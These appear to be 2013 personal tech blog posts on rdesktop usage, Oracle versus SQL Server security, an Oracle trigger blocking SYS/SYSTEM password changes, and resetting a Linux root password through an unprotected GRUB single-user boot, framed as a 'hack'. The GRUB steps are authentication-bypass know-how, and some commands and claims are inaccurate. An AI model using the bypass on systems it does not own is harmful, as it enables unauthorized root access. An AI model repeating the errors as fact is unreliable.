rdesktop is an open source client for Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop. rdesktop is known to work with Windows versions such as NT 4 Terminal Server, 2000, XP, 2003, 2003 R2, Vista, 2008, 7, and 2008 R2. Click Here.


You can install the package using yum like the below :
# rpm -qa rdesktop

Regarding to website to connect Windows from linux you need to use -u which indicate for username follows with hostname to be like this
# rdesktop -u Administrator osama

Osama : hostname
Administrator : Username






Useful !!!


Thank you
Osama mustafa

Wednesday, April 3, 2013

Reset/Hack Linux Root Password ( Unprocted GRUB )

Do you want to learn something New ? Hack/Reset Root Linux Password Then Continue Reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What If I Forget Root Password? Check The below

Restart The Server and you must see this screen Pause it click arrow :





Second Press "a" then add "1" like the below screen after finish Press enter :



Now Black Screen :




Print "Runlevel"




and Reset Root Password like the below by type "passwd" command :



Note : This Way works with Redhat , Fedora and CentOs i didn't try it on Ubuntu

Thank you
Osama mustafa







Tuesday, April 2, 2013

Oracle Database vs Sql Server Security


Which one is the more secure ?

the above question asked before and will be asked today and in the future but what is the answer !! Before start asnwering this question you need to discuss somepoints.

as introduction Sql server is database solution product from Microsoft corporation with the following Version list :

  • SQL Server 2012
  • SQL Server 2008 R2
  • SQL Server 2008
  • SQL Server 2005
  • SQL Server 2000
  • SQL Server 7.0
 On the other hand we have oracle Database which RDMS ( Relation Database Managment System ) with the following version list :
 
  • Oracle7
  • Oracle8 Database
  • Oracle8i Database
  • Oracle9i Database
  • Oracle Database 10g
  • Oracle Database 11g
each of database include new features, this features could be related to high availability, database features and secuirty features, I try to be fair in my judgment, Let's Back to Question Which is More Secure Oracle Database vs Microsoft Sql Server ? and why ?

I read lot of research regarding to this question and most of them caliming that sql server is more secure than Oracle database but why ?  oracle is the best database for large organization and can store more date with a great security when i mean great Security  there's lot of solution products from Oracle such as Database vault , Audit Vault , and Data masking. But for small solutions and Orginization most of them use Sql server .

I red this Reports for David Litchfield here. and published in November 2006 and calims hat sql server is more secure than oracle database. also you need to know while you are compare this two database the main difference between them :

Microsoft Sql server is only working on One Platform ( Windows ), easy to manage, Most of the administration thru GUI (very friendly ) ,  simple to install  , Sql server is cost less than oracle ( Cost much more than less )  Licensing fees. all this indicate me to the following :

  • since sql server is easy to install and administration then the performance is usually fine.
  •  The only way to scale a system built on sql server technology is to add more memory and CPU to the single server hosting the database.
  • as mention before Sql server Suport Only One Platform.
On the other hand Oracle is Support all plaforms ( Linux , Unix , Windows , HP , AIX and Sun .. and sorry i forgot to mention others ), i will not say it's easy to install but document are available for free if you follow them you will not be lost, Oracle database is enterprise solutions which mean if you need database that store huge data and support high availability cluster ( sql server dose not support it ) and introduce lot of backup recovery solution, data guard on of them becuase of this it's expensive and costing the company don't forget the main reason Oracle DBA salary is more than Sql server which mean the compaines will study this case before looking for solutions.

also to be fair Oracle support talking some time to answering you and solve the issue or database vulnerability , however in sql server support it's amazing and solve the issue or vulnerability database in 24 hours or less.

since oracle database working for large organization business such as finical and insurance company the aim for any hackers ( i would like to mention here hacker not looking for small company to hack it's need something will be worth if he getting caught ) it will make it under attack for any hacker in my articles i mentioned there's no secure system 100% but you can make it harder for any hacker to access to your data and oracle provide with products to do that : Data Valut , Audit Vault , Database firewall and encryption.

Another point i would like to mention here ( take it also as point when you compare ) oracle working on more than platforms.so Focusing on one  platform Security  will be the same as five/six/... platforms Security ? you should answer on this question not me !!!

 Oracle's capacity to run on large databases, its have many performance improvement features,the performance can include Hardware or database ( sql server only hardware ) which is more secure ?
it's completely up to you but don't miss or ignore the point i mentioned before in this article

Thank you
Osama Mustafa

Monday, April 1, 2013

Sys Password and Alter User Privileges


While I am browsing i found this topic which is really amazing and Useful if you are interested securing your database, I mentioned before in my topics to secure database you need to start with simple steps first the below is one of them :
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by new_password;
alter user system identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by new_password;
alter user sys identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5